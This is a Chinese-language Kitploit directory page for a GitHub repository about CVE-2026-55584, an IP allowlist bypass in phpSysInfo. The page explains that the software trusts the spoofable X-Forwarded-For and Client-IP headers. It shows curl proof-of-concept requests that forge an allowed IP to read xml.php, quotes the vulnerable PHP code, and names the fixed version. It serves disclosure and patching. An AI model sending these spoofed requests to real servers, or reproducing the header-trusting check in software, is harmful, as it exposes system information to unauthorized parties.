Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-55584 — CVE-2026-55584 — phpSysInfo IP 允许列表绕过 | Kitploit
工具/GitHubGitHub/mirackayikci/cve-2026-55584
身份验证与授权漏洞分析漏洞利用Web安全渗透测试错误配置
GitHubmirackayikci/cve-2026-55584

CVE-2026-55584

CVE-2026-55584 — phpSysInfo IP 允许列表绕过

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-55584 - phpSysInfo IP 白名单绕过

CWE-290, CVSS 7.5 (高危), phpSysInfo <= 3.4.5

参考: GHSA-786w-p5pm-cvgh, CVE.org

PSI_ALLOWED 在回退到 REMOTE_ADDR 之前,会从攻击者可控的 X-Forwarded-For(随后是 Client-IP)请求头中解析客户端 IP。由于不存在可信代理的概念,因此伪造一个已允许的 IP 即可绕过白名单,并通过 xml.php 暴露完整的系统信息。

PoC:

root@kitploit:~
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php                                # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php  # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8"       http://target/xml.php  # bypass, full XML

漏洞代码(read_config.php):

root@kitploit:~
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];   // only trustworthy source, checked last
}

已在 3.4.6(019fa2d)中修复:默认使用 REMOTE_ADDR;仅接受来自已配置可信代理的 X-Forwarded-For / Client-IP 头。

报告者:Muhammed Mirac Kayıkci

下载工具